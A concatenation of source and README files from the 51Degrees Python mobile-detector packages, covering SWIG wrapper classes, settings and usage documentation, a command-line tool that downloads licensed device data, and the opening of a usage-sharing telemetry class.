return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.Match_getValueAsDouble(self, *args)
def getDeviceId(self):
return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.Match_getDeviceId(self)
def getRank(self):
return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.Match_getRank(self)
def getDifference(self):
return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.Match_getDifference(self)
def getMethod(self):
return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.Match_getMethod(self)
def getUserAgent(self):
return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.Match_getUserAgent(self)
# Register Match in _fiftyone_degrees_mobile_detector_v3_trie_wrapper:
_fiftyone_degrees_mobile_detector_v3_trie_wrapper.Match_swigregister(Match)
class Provider(_object):
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, Provider, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, Provider, name)
__repr__ = _swig_repr
__swig_destroy__ = _fiftyone_degrees_mobile_detector_v3_trie_wrapper.delete_Provider
def __del__(self):
return None
def getHttpHeaders(self):
return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.Provider_getHttpHeaders(self)
def getAvailableProperties(self):
return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.Provider_getAvailableProperties(self)
def getDataSetName(self):
return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.Provider_getDataSetName(self)
def getDataSetFormat(self):
return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.Provider_getDataSetFormat(self)
def getDataSetPublishedDate(self):
return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.Provider_getDataSetPublishedDate(self)
def getDataSetNextUpdateDate(self):
return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.Provider_getDataSetNextUpdateDate(self)
def getDataSetSignatureCount(self):
return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.Provider_getDataSetSignatureCount(self)
def getDataSetDeviceCombinations(self):
return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.Provider_getDataSetDeviceCombinations(self)
def getMatch(self, *args):
return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.Provider_getMatch(self, *args)
def getMatchWithTolerances(self, *args):
return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.Provider_getMatchWithTolerances(self, *args)
def getMatchJson(self, *args):
return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.Provider_getMatchJson(self, *args)
def setDrift(self, drift):
return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.Provider_setDrift(self, drift)
def setDifference(self, difference):
return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.Provider_setDifference(self, difference)
def reloadFromFile(self):
return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.Provider_reloadFromFile(self)
def reloadFromMemory(self, source, size):
return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.Provider_reloadFromMemory(self, source, size)
def getIsThreadSafe(self):
return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.Provider_getIsThreadSafe(self)
def __init__(self, *args):
this = _fiftyone_degrees_mobile_detector_v3_trie_wrapper.new_Provider(*args)
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
# Register Provider in _fiftyone_degrees_mobile_detector_v3_trie_wrapper:
_fiftyone_degrees_mobile_detector_v3_trie_wrapper.Provider_swigregister(Provider)
# This file is compatible with both classic and new-style classes. | 51degrees-mobile-detector-v3-trie-wrapper | /51degrees-mobile-detector-v3-trie-wrapper-3.2.18.4.tar.gz/51degrees-mobile-detector-v3-trie-wrapper-3.2.18.4/FiftyOneDegrees/fiftyone_degrees_mobile_detector_v3_trie_wrapper.py | fiftyone_degrees_mobile_detector_v3_trie_wrapper.py |
|51degrees|
Device Detection Python API
51Degrees Mobile Detector is a server side mobile detection solution.
Changelog
====================
- Fixed a bug where an additional compile argument was causing compilation errors with clang.
- Updated the v3-trie-wrapper package to include the Lite Hash Trie data file.
- Updated Lite Pattern data file for November.
- Updated Lite Hash Trie data file for November.
General
========
Before you start matching user agents, you may wish to configure the solution to use a different datadase. You can easily generate a sample settings file running the following command
$ 51degrees-mobile-detector settings > ~/51degrees-mobile-detector.settings.py
The core ``51degrees-mobile-detector`` is included as a dependency when installing either the ``51degrees-mobile-detector-v3-wrapper`` or ``51degrees-mobile-detector-v3-wrapper`` packages.
During install a directory which contains your data file will be created in ``~\51Degrees``.
Settings
=========
General Settings
----------------
- ``DETECTION_METHOD`` (defaults to 'v3-wrapper'). Sets the preferred mobile device detection method. Available options are v3-wrapper (requires 51degrees-mobile-detector-v3-wrapper package), v3-trie-wrapper
- ``PROPERTIES`` (defaults to ''). List of case-sensitive property names to be fetched on every device detection. Leave empty to fetch all available properties.
- ``LICENCE`` Your 51Degrees license key for enhanced device data. This is required if you want to set up the automatic 51degrees-mobile-detector-premium-pattern-wrapper package updates.
Trie Detector settings
-----------------------
- ``V3_TRIE_WRAPPER_DATABASE`` Location of the Hash Trie data file.
Pattern Detector settings
--------------------------
- ``V3_WRAPPER_DATABASE`` Location of the Pattern data file.
- ``CACHE_SIZE`` (defaults to 10000). Sets the size of the workset cache.
- ``POOL_SIZE`` (defaults to 20). Sets the size of the workset pool.
Usage Sharer Settings
----------------------
- ``USAGE_SHARER_ENABLED`` (defaults to True). Indicates if usage data should be shared with 51Degrees.com. We recommended leaving this value unchanged to ensure we're improving the performance and accuracy of the solution.
- Adavanced usage sharer settings are detailed in your settings file.
Automatic Updates
------------------
If you want to set up automatic updates, add your license key to your settings and add the following command to your cron
$ 51degrees-mobile-detector update-premium-pattern-wrapper
NOTE: Currently auto updates are only available with our Pattern API.
Usage
======
Core
-----
By executing the following a useful help page will be displayed explaining basic usage.
$ 51degrees-mobile-detector
To check everything is set up , try fetching a match with
$ 51degrees-mobile-detector match "Mozilla/5.0 (iPad; CPU OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Mobile/9B176"
Examples
=========
Additional examples can be found on our GitHub_ repository.
User Support
============
If you have any issues please get in touch with our Support_ or open an issue on our GitHub_ repository.
.. |51degrees| image:: https://51degrees.com/DesktopModules/FiftyOne/Distributor/Logo.ashx?utm_source=github&utm_medium=repository&utm_content=readme_pattern&utm_campaign=python-open-source
:target: https://51degrees.com
.. _GitHub: https://github.com/51Degrees/Device-Detection/tree/master/python
.. _Support: support@51degrees.com
| 51degrees-mobile-detector-v3-wrapper | /51degrees-mobile-detector-v3-wrapper-3.2.18.4.tar.gz/51degrees-mobile-detector-v3-wrapper-3.2.18.4/README.rst | README.rst |
from sys import version_info as _swig_python_version_info
if _swig_python_version_info < (2, 7, 0):
raise RuntimeError('Python 2.7 or later required')
def swig_import_helper():
import importlib
pkg = __name__.rpartition('.')[0]
mname = '.'.join((pkg, '_fiftyone_degrees_mobile_detector_v3_wrapper')).lstrip('.')
try:
return importlib.import_module(mname)
except ImportError:
return importlib.import_module('_fiftyone_degrees_mobile_detector_v3_wrapper')
_fiftyone_degrees_mobile_detector_v3_wrapper = swig_import_helper()
del swig_import_helper
del _swig_python_version_info
try:
import builtins as __builtin__
except ImportError:
import __builtin__
def _swig_setattr_nondynamic(self, class_type, name, value, static=1):
if name == "thisown":
return self.this.own(value)
if name == "this":
if type(value).__name__ == 'SwigPyObject':
self.__dict__[name] = value
return
method = class_type.__swig_setmethods__.get(name, None)
if method:
return method(self, value)
if not static:
if _newclass:
object.__setattr__(self, name, value)
else:
self.__dict__[name] = value
else:
raise AttributeError("You cannot add attributes to %s" % self)
def _swig_setattr(self, class_type, name, value):
return _swig_setattr_nondynamic(self, class_type, name, value, 0)
def _swig_getattr(self, class_type, name):
if name == "thisown":
return self.this.own()
method = class_type.__swig_getmethods__.get(name, None)
if method:
return method(self)
raise AttributeError("'%s' object has no attribute '%s'" % (class_type.__name__, name))
def _swig_repr(self):
try:
strthis = "proxy of " + self.this.__repr__()
except __builtin__.Exception:
strthis = ""
return "<%s.%s; %s >" % (self.__class__.__module__, self.__class__.__name__, strthis,)
try:
_object = object
_newclass = 1
except __builtin__.Exception:
class _object:
pass
_newclass = 0
class SwigPyIterator(_object):
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, SwigPyIterator, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, SwigPyIterator, name)
def __init__(self, *args, **kwargs):
raise AttributeError("No constructor defined - class is abstract")
__repr__ = _swig_repr
__swig_destroy__ = _fiftyone_degrees_mobile_detector_v3_wrapper.delete_SwigPyIterator
def __del__(self):
return None
def value(self):
return _fiftyone_degrees_mobile_detector_v3_wrapper.SwigPyIterator_value(self)
def incr(self, n=1):
return _fiftyone_degrees_mobile_detector_v3_wrapper.SwigPyIterator_incr(self, n)
def decr(self, n=1):
return _fiftyone_degrees_mobile_detector_v3_wrapper.SwigPyIterator_decr(self, n)
def distance(self, x):
return _fiftyone_degrees_mobile_detector_v3_wrapper.SwigPyIterator_distance(self, x)
def equal(self, x):
return _fiftyone_degrees_mobile_detector_v3_wrapper.SwigPyIterator_equal(self, x)
def copy(self):
return _fiftyone_degrees_mobile_detector_v3_wrapper.SwigPyIterator_copy(self)
def next(self):
return _fiftyone_degrees_mobile_detector_v3_wrapper.SwigPyIterator_next(self)
def __next__(self):
return _fiftyone_degrees_mobile_detector_v3_wrapper.SwigPyIterator___next__(self)
def previous(self):
return _fiftyone_degrees_mobile_detector_v3_wrapper.SwigPyIterator_previous(self)
def advance(self, n):
return _fiftyone_degrees_mobile_detector_v3_wrapper.SwigPyIterator_advance(self, n)
def __eq__(self, x):
return _fiftyone_degrees_mobile_detector_v3_wrapper.SwigPyIterator___eq__(self, x)
def __ne__(self, x):
return _fiftyone_degrees_mobile_detector_v3_wrapper.SwigPyIterator___ne__(self, x)
def __iadd__(self, n):
return _fiftyone_degrees_mobile_detector_v3_wrapper.SwigPyIterator___iadd__(self, n)
def __isub__(self, n):
return _fiftyone_degrees_mobile_detector_v3_wrapper.SwigPyIterator___isub__(self, n)
def __add__(self, n):
return _fiftyone_degrees_mobile_detector_v3_wrapper.SwigPyIterator___add__(self, n)
def __sub__(self, *args):
return _fiftyone_degrees_mobile_detector_v3_wrapper.SwigPyIterator___sub__(self, *args)
def __iter__(self):
return self
# Register SwigPyIterator in _fiftyone_degrees_mobile_detector_v3_wrapper:
_fiftyone_degrees_mobile_detector_v3_wrapper.SwigPyIterator_swigregister(SwigPyIterator)
class MapStringString(_object):
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, MapStringString, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, MapStringString, name)
__repr__ = _swig_repr
def iterator(self):
return _fiftyone_degrees_mobile_detector_v3_wrapper.MapStringString_iterator(self)
def __iter__(self):
return self.iterator()
def __nonzero__(self):
return _fiftyone_degrees_mobile_detector_v3_wrapper.MapStringString___nonzero__(self)
def __bool__(self):
return _fiftyone_degrees_mobile_detector_v3_wrapper.MapStringString___bool__(self)
def __len__(self):
return _fiftyone_degrees_mobile_detector_v3_wrapper.MapStringString___len__(self)
def __iter__(self):
return self.key_iterator()
def iterkeys(self):
return self.key_iterator()
def itervalues(self):
return self.value_iterator()
def iteritems(self):
return self.iterator()
def __getitem__(self, key):
return _fiftyone_degrees_mobile_detector_v3_wrapper.MapStringString___getitem__(self, key)
def __delitem__(self, key):
return _fiftyone_degrees_mobile_detector_v3_wrapper.MapStringString___delitem__(self, key)
def has_key(self, key):
return _fiftyone_degrees_mobile_detector_v3_wrapper.MapStringString_has_key(self, key)
def keys(self):
return _fiftyone_degrees_mobile_detector_v3_wrapper.MapStringString_keys(self)
def values(self):
return _fiftyone_degrees_mobile_detector_v3_wrapper.MapStringString_values(self)
def items(self):
return _fiftyone_degrees_mobile_detector_v3_wrapper.MapStringString_items(self)
def __contains__(self, key):
return _fiftyone_degrees_mobile_detector_v3_wrapper.MapStringString___contains__(self, key)
def key_iterator(self):
return _fiftyone_degrees_mobile_detector_v3_wrapper.MapStringString_key_iterator(self)
def value_iterator(self):
return _fiftyone_degrees_mobile_detector_v3_wrapper.MapStringString_value_iterator(self)
def __setitem__(self, *args):
return _fiftyone_degrees_mobile_detector_v3_wrapper.MapStringString___setitem__(self, *args)
def asdict(self):
return _fiftyone_degrees_mobile_detector_v3_wrapper.MapStringString_asdict(self)
def __init__(self, *args):
this = _fiftyone_degrees_mobile_detector_v3_wrapper.new_MapStringString(*args)
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
def empty(self):
return _fiftyone_degrees_mobile_detector_v3_wrapper.MapStringString_empty(self)
def size(self):
return _fiftyone_degrees_mobile_detector_v3_wrapper.MapStringString_size(self)
def swap(self, v):
return _fiftyone_degrees_mobile_detector_v3_wrapper.MapStringString_swap(self, v)
def begin(self):
return _fiftyone_degrees_mobile_detector_v3_wrapper.MapStringString_begin(self)
def end(self):
return _fiftyone_degrees_mobile_detector_v3_wrapper.MapStringString_end(self)
def rbegin(self):
return _fiftyone_degrees_mobile_detector_v3_wrapper.MapStringString_rbegin(self)
def rend(self):
return _fiftyone_degrees_mobile_detector_v3_wrapper.MapStringString_rend(self)
def clear(self):
return _fiftyone_degrees_mobile_detector_v3_wrapper.MapStringString_clear(self)
def get_allocator(self):
return _fiftyone_degrees_mobile_detector_v3_wrapper.MapStringString_get_allocator(self)
def count(self, x):
return _fiftyone_degrees_mobile_detector_v3_wrapper.MapStringString_count(self, x)
def erase(self, *args):
return _fiftyone_degrees_mobile_detector_v3_wrapper.MapStringString_erase(self, *args)
def find(self, x):
return _fiftyone_degrees_mobile_detector_v3_wrapper.MapStringString_find(self, x)
def lower_bound(self, x):
return _fiftyone_degrees_mobile_detector_v3_wrapper.MapStringString_lower_bound(self, x)
def upper_bound(self, x):
return _fiftyone_degrees_mobile_detector_v3_wrapper.MapStringString_upper_bound(self, x)
__swig_destroy__ = _fiftyone_degrees_mobile_detector_v3_wrapper.delete_MapStringString
def __del__(self):
return None
# Register MapStringString in _fiftyone_degrees_mobile_detector_v3_wrapper:
_fiftyone_degrees_mobile_detector_v3_wrapper.MapStringString_swigregister(MapStringString)
class VectorString(_object):
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, VectorString, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, VectorString, name)
__repr__ = _swig_repr
def iterator(self):
return _fiftyone_degrees_mobile_detector_v3_wrapper.VectorString_iterator(self)
def __iter__(self):
return self.iterator()
def __nonzero__(self):
return _fiftyone_degrees_mobile_detector_v3_wrapper.VectorString___nonzero__(self)
def __bool__(self):
return _fiftyone_degrees_mobile_detector_v3_wrapper.VectorString___bool__(self)
def __len__(self):
return _fiftyone_degrees_mobile_detector_v3_wrapper.VectorString___len__(self)
def __getslice__(self, i, j):
return _fiftyone_degrees_mobile_detector_v3_wrapper.VectorString___getslice__(self, i, j)
def __setslice__(self, *args):
return _fiftyone_degrees_mobile_detector_v3_wrapper.VectorString___setslice__(self, *args)
def __delslice__(self, i, j):
return _fiftyone_degrees_mobile_detector_v3_wrapper.VectorString___delslice__(self, i, j)
def __delitem__(self, *args):
return _fiftyone_degrees_mobile_detector_v3_wrapper.VectorString___delitem__(self, *args)
def __getitem__(self, *args):
return _fiftyone_degrees_mobile_detector_v3_wrapper.VectorString___getitem__(self, *args)
def __setitem__(self, *args):
return _fiftyone_degrees_mobile_detector_v3_wrapper.VectorString___setitem__(self, *args)
def pop(self):
return _fiftyone_degrees_mobile_detector_v3_wrapper.VectorString_pop(self)
def append(self, x):
return _fiftyone_degrees_mobile_detector_v3_wrapper.VectorString_append(self, x)
def empty(self):
return _fiftyone_degrees_mobile_detector_v3_wrapper.VectorString_empty(self)
def size(self):
return _fiftyone_degrees_mobile_detector_v3_wrapper.VectorString_size(self)
def swap(self, v):
return _fiftyone_degrees_mobile_detector_v3_wrapper.VectorString_swap(self, v)
def begin(self):
return _fiftyone_degrees_mobile_detector_v3_wrapper.VectorString_begin(self)
def end(self):
return _fiftyone_degrees_mobile_detector_v3_wrapper.VectorString_end(self)
def rbegin(self):
return _fiftyone_degrees_mobile_detector_v3_wrapper.VectorString_rbegin(self)
def rend(self):
return _fiftyone_degrees_mobile_detector_v3_wrapper.VectorString_rend(self)
def clear(self):
return _fiftyone_degrees_mobile_detector_v3_wrapper.VectorString_clear(self)
def get_allocator(self):
return _fiftyone_degrees_mobile_detector_v3_wrapper.VectorString_get_allocator(self)
def pop_back(self):
return _fiftyone_degrees_mobile_detector_v3_wrapper.VectorString_pop_back(self)
def erase(self, *args):
return _fiftyone_degrees_mobile_detector_v3_wrapper.VectorString_erase(self, *args)
def __init__(self, *args):
this = _fiftyone_degrees_mobile_detector_v3_wrapper.new_VectorString(*args)
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
def push_back(self, x):
return _fiftyone_degrees_mobile_detector_v3_wrapper.VectorString_push_back(self, x)
def front(self):
return _fiftyone_degrees_mobile_detector_v3_wrapper.VectorString_front(self)
def back(self):
return _fiftyone_degrees_mobile_detector_v3_wrapper.VectorString_back(self)
def assign(self, n, x):
return _fiftyone_degrees_mobile_detector_v3_wrapper.VectorString_assign(self, n, x)
def resize(self, *args):
return _fiftyone_degrees_mobile_detector_v3_wrapper.VectorString_resize(self, *args)
def insert(self, *args):
return _fiftyone_degrees_mobile_detector_v3_wrapper.VectorString_insert(self, *args)
def reserve(self, n):
return _fiftyone_degrees_mobile_detector_v3_wrapper.VectorString_reserve(self, n)
def capacity(self):
return _fiftyone_degrees_mobile_detector_v3_wrapper.VectorString_capacity(self)
__swig_destroy__ = _fiftyone_degrees_mobile_detector_v3_wrapper.delete_VectorString
def __del__(self):
return None
# Register VectorString in _fiftyone_degrees_mobile_detector_v3_wrapper:
_fiftyone_degrees_mobile_detector_v3_wrapper.VectorString_swigregister(VectorString)
class Match(_object):
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, Match, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, Match, name)
def __init__(self, *args, **kwargs):
raise AttributeError("No constructor defined")
__repr__ = _swig_repr
__swig_destroy__ = _fiftyone_degrees_mobile_detector_v3_wrapper.delete_Match
def __del__(self):
return None
def getValues(self, *args):
return _fiftyone_degrees_mobile_detector_v3_wrapper.Match_getValues(self, *args)
def getValue(self, *args):
return _fiftyone_degrees_mobile_detector_v3_wrapper.Match_getValue(self, *args)
def getDeviceId(self):
return _fiftyone_degrees_mobile_detector_v3_wrapper.Match_getDeviceId(self)
def getRank(self):
return _fiftyone_degrees_mobile_detector_v3_wrapper.Match_getRank(self)
def getDifference(self):
return _fiftyone_degrees_mobile_detector_v3_wrapper.Match_getDifference(self)
def getMethod(self):
return _fiftyone_degrees_mobile_detector_v3_wrapper.Match_getMethod(self)
def getUserAgent(self):
return _fiftyone_degrees_mobile_detector_v3_wrapper.Match_getUserAgent(self)
# Register Match in _fiftyone_degrees_mobile_detector_v3_wrapper:
_fiftyone_degrees_mobile_detector_v3_wrapper.Match_swigregister(Match)
class Profiles(_object):
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, Profiles, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, Profiles, name)
__repr__ = _swig_repr
__swig_destroy__ = _fiftyone_degrees_mobile_detector_v3_wrapper.delete_Profiles
def __del__(self):
return None
def __init__(self):
this = _fiftyone_degrees_mobile_detector_v3_wrapper.new_Profiles()
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
def getCount(self):
return _fiftyone_degrees_mobile_detector_v3_wrapper.Profiles_getCount(self)
def getProfileIndex(self, index):
return _fiftyone_degrees_mobile_detector_v3_wrapper.Profiles_getProfileIndex(self, index)
def getProfileId(self, index):
return _fiftyone_degrees_mobile_detector_v3_wrapper.Profiles_getProfileId(self, index)
# Register Profiles in _fiftyone_degrees_mobile_detector_v3_wrapper:
_fiftyone_degrees_mobile_detector_v3_wrapper.Profiles_swigregister(Profiles)
class Provider(_object):
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, Provider, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, Provider, name)
__repr__ = _swig_repr
__swig_destroy__ = _fiftyone_degrees_mobile_detector_v3_wrapper.delete_Provider
def __del__(self):
return None
def getHttpHeaders(self):
return _fiftyone_degrees_mobile_detector_v3_wrapper.Provider_getHttpHeaders(self)
def getAvailableProperties(self):
return _fiftyone_degrees_mobile_detector_v3_wrapper.Provider_getAvailableProperties(self)
def getDataSetName(self):
return _fiftyone_degrees_mobile_detector_v3_wrapper.Provider_getDataSetName(self)
def getDataSetFormat(self):
return _fiftyone_degrees_mobile_detector_v3_wrapper.Provider_getDataSetFormat(self)
def getDataSetPublishedDate(self):
return _fiftyone_degrees_mobile_detector_v3_wrapper.Provider_getDataSetPublishedDate(self)
def getDataSetNextUpdateDate(self):
return _fiftyone_degrees_mobile_detector_v3_wrapper.Provider_getDataSetNextUpdateDate(self)
def getDataSetSignatureCount(self):
return _fiftyone_degrees_mobile_detector_v3_wrapper.Provider_getDataSetSignatureCount(self)
def getDataSetDeviceCombinations(self):
return _fiftyone_degrees_mobile_detector_v3_wrapper.Provider_getDataSetDeviceCombinations(self)
def getMatch(self, *args):
return _fiftyone_degrees_mobile_detector_v3_wrapper.Provider_getMatch(self, *args)
def getMatchJson(self, *args):
return _fiftyone_degrees_mobile_detector_v3_wrapper.Provider_getMatchJson(self, *args)
def getMatchForDeviceId(self, deviceId):
return _fiftyone_degrees_mobile_detector_v3_wrapper.Provider_getMatchForDeviceId(self, deviceId)
def findProfiles(self, *args):
return _fiftyone_degrees_mobile_detector_v3_wrapper.Provider_findProfiles(self, *args)
def reloadFromFile(self):
return _fiftyone_degrees_mobile_detector_v3_wrapper.Provider_reloadFromFile(self)
def reloadFromMemory(self, source, length):
return _fiftyone_degrees_mobile_detector_v3_wrapper.Provider_reloadFromMemory(self, source, length)
def getCacheHits(self):
return _fiftyone_degrees_mobile_detector_v3_wrapper.Provider_getCacheHits(self)
def getCacheMisses(self):
return _fiftyone_degrees_mobile_detector_v3_wrapper.Provider_getCacheMisses(self)
def getCacheMaxIterations(self):
return _fiftyone_degrees_mobile_detector_v3_wrapper.Provider_getCacheMaxIterations(self)
def getIsThreadSafe(self):
return _fiftyone_degrees_mobile_detector_v3_wrapper.Provider_getIsThreadSafe(self)
def __init__(self, *args):
this = _fiftyone_degrees_mobile_detector_v3_wrapper.new_Provider(*args)
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
# Register Provider in _fiftyone_degrees_mobile_detector_v3_wrapper:
_fiftyone_degrees_mobile_detector_v3_wrapper.Provider_swigregister(Provider)
# This file is compatible with both classic and new-style classes. | 51degrees-mobile-detector-v3-wrapper | /51degrees-mobile-detector-v3-wrapper-3.2.18.4.tar.gz/51degrees-mobile-detector-v3-wrapper-3.2.18.4/FiftyOneDegrees/fiftyone_degrees_mobile_detector_v3_wrapper.py | fiftyone_degrees_mobile_detector_v3_wrapper.py |
|51degrees|
Device Detection Python API
51Degrees Mobile Detector is a server side mobile detection solution.
Changelog
====================
- Fixed a bug where an additional compile argument was causing compilation errors with clang.
- Updated the v3-trie-wrapper package to include the Lite Hash Trie data file.
- Updated Lite Pattern data file for November.
- Update Lite Hash Trie data file for November.
General
========
Before you start matching user agents, you may wish to configure the solution to use a different database. You can easily generate a sample settings file running the following command
$ 51degrees-mobile-detector settings > ~/51degrees-mobile-detector.settings.py
The core ``51degrees-mobile-detector`` is included as a dependency when installing either the ``51degrees-mobile-detector-v3-wrapper`` or ``51degrees-mobile-detector-v3-wrapper`` packages.
During install a directory which contains your data file will be created in ``~\51Degrees``.
Settings
=========
General Settings
----------------
- ``DETECTION_METHOD`` (defaults to 'v3-wrapper'). Sets the preferred mobile device detection method. Available options are v3-wrapper (requires 51degrees-mobile-detector-v3-wrapper package), v3-trie-wrapper
- ``PROPERTIES`` (defaults to ''). List of case-sensitive property names to be fetched on every device detection. Leave empty to fetch all available properties.
- ``LICENCE`` Your 51Degrees license key for enhanced device data. This is required if you want to set up the automatic 51degrees-mobile-detector-premium-pattern-wrapper package updates.
Trie Detector settings
-----------------------
- ``V3_TRIE_WRAPPER_DATABASE`` Location of the Hash Trie data file.
Pattern Detector settings
--------------------------
- ``V3_WRAPPER_DATABASE`` Location of the Pattern data file.
- ``CACHE_SIZE`` (defaults to 10000). Sets the size of the workset cache.
- ``POOL_SIZE`` (defaults to 20). Sets the size of the workset pool.
Usage Sharer Settings
----------------------
- ``USAGE_SHARER_ENABLED`` (defaults to True). Indicates if usage data should be shared with 51Degrees.com. We recommended leaving this value unchanged to ensure we're improving the performance and accuracy of the solution.
- Adavanced usage sharer settings are detailed in your settings file.
Automatic Updates
------------------
If you want to set up automatic updates, add your license key to your settings and add the following command to your cron
$ 51degrees-mobile-detector update-premium-pattern-wrapper
NOTE: Currently auto updates are only available with our Pattern API.
Usage
======
Core
-----
By executing the following a useful help page will be displayed explaining basic usage.
$ 51degrees-mobile-detector
To check everything is set up , try fetching a match with
$ 51degrees-mobile-detector match "Mozilla/5.0 (iPad; CPU OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Mobile/9B176"
Examples
=========
Additional examples can be found on our GitHub_ repository.
User Support
============
If you have any issues please get in touch with our Support_ or open an issue on our GitHub_ repository.
.. |51degrees| image:: https://51degrees.com/DesktopModules/FiftyOne/Distributor/Logo.ashx?utm_source=github&utm_medium=repository&utm_content=readme_pattern&utm_campaign=python-open-source
:target: https://51degrees.com
.. _GitHub: https://github.com/51Degrees/Device-Detection/tree/master/python
.. _Support: support@51degrees.com
| 51degrees-mobile-detector | /51degrees-mobile-detector-3.2.18.4.tar.gz/51degrees-mobile-detector-3.2.18.4/README.rst | README.rst |
from __future__ import absolute_import
import os
import sys
import subprocess
def settings(args, help):
import inspect
from fiftyone_degrees.mobile_detector.conf import default
sys.stdout.write(inspect.getsource(default))
def match(args, help):
if len(args) == 1:
from fiftyone_degrees import mobile_detector
device = mobile_detector.match(args[0])
for name, value in device.properties.iteritems():
sys.stdout.write('%s: %s\n' % (name, unicode(value),))
else:
sys.stderr.write(help)
sys.exit(1)
def update_premium_pattern_wrapper(args, help):
import tempfile
import urllib2
import gzip
import shutil
from fiftyone_degrees.mobile_detector.conf import settings
sys.stdout.write('Starting Update \n')
if settings.LICENSE:
# Build source URL.
url = 'https://distributor.51degrees.com/api/v2/download?LicenseKeys=%s&Type=BinaryV32&Download=True' % (
settings.LICENSE
)
with tempfile.NamedTemporaryFile(
suffix='.dat.gz',
prefix='51d_temp',
delete=False) as fh:
delete = True
try:
# Fetch URL (no verification of the server's certificate here).
uh = urllib2.urlopen(url, timeout=120)
# Check server response.
if uh.headers['Content-Disposition'] is not None:
# Download the package.
file_size = int(uh.headers['Content-Length'])
sys.stdout.write('=> Downloading %s bytes... ' % file_size)
downloaded = 0
while True:
buffer = uh.read(8192)
if buffer:
downloaded += len(buffer)
fh.write(buffer)
status = r'%3.2f%%' % (downloaded * 100.0 / file_size)
status = status + chr(8) * (len(status) + 1)
print status,
else:
break
#Done with temporary file. Close it.
if not fh.closed:
fh.close()
#Open zipped file.
f_name = fh.name
zipped_file = gzip.open(f_name, "rb")
#Open temporary file to store unzipped content.
unzipped_file = open("unzipped_temp.dat", "wb")
#Unarchive content to temporary file.
unzipped_file.write(zipped_file.read())
#Close and remove compressed file.
zipped_file.close()
os.remove(f_name)
#Close the unzipped file before copying.
unzipped_file.close()
#Copy unzipped file to the file used for detection.
path = settings.V3_WRAPPER_DATABASE
shutil.copy2("unzipped_temp.dat", path)
#clean-up
if not zipped_file.closed:
zipped_file.close()
if not unzipped_file.closed:
unzipped_file.close()
sys.stdout.write("\n Update was successfull \n")
#End of try to update package.
else:
sys.stderr.write('Failed to download the package: is your license key expired?\n')
except Exception as e:
sys.stderr.write('Failed to download the package: %s.\n' % unicode(e))
finally:
try:
os.remove("unzipped_temp.dat")
os.remove(fh)
except:
pass
else:
sys.stderr.write('Failed to download the package: you need a license key. Please, check you settings.\n')
def main():
# Build help message.
help = '''Usage:
%(cmd)s settings:
Dumps sample settings file.
%(cmd)s match <user agent>
Fetches device properties based on the input user agent string.
%(cmd)s update-premium-pattern-wrapper
Downloads and installs latest premium pattern wrapper package available
at 51Degrees.com website (a valid license key is required).
''' % {
'cmd': os.path.basename(sys.argv[0])
}
# Check base arguments.
if len(sys.argv) > 1:
command = sys.argv[1].replace('-', '_')
if command in ('settings', 'match', 'update_premium_pattern_wrapper'):
getattr(sys.modules[__name__], command)(sys.argv[2:], help)
else:
sys.stderr.write(help)
sys.exit(1)
else:
sys.stderr.write(help)
sys.exit(1)
if __name__ == '__main__':
main() | 51degrees-mobile-detector | /51degrees-mobile-detector-3.2.18.4.tar.gz/51degrees-mobile-detector-3.2.18.4/fiftyone_degrees/mobile_detector/runner.py | runner.py |
from __future__ import absolute_import
from datetime import datetime
import gzip
import urllib2
import threading
try:
import xml.etree.cElementTree as ET
except ImportError:
import xml.etree.ElementTree as ET
try:
import cStringIO as StringIO
except ImportError:
import StringIO
from fiftyone_degrees.mobile_detector.conf import settings
class UsageSharer(threading.Thread):
'''Class used to record usage information.
Records & submits usage information which is essential to ensuring
51Degrees.mobi is optimized for performance and accuracy for current
devices on the web.
'''
# Singleton reference.
_instance = None
def __init__(self):
super(UsageSharer, self).__init__()
# Check singleton instance.
if self._instance is not None:
raise ValueError('An instance of UsageSharer class already exists.')
# Init internal singleton state.
self._queue = []
self._stopping = False
self._event = threading.Event()
@classmethod
def instance(cls):
'''Returns singleton UsageSharer instance.
'''
if cls._instance is None:
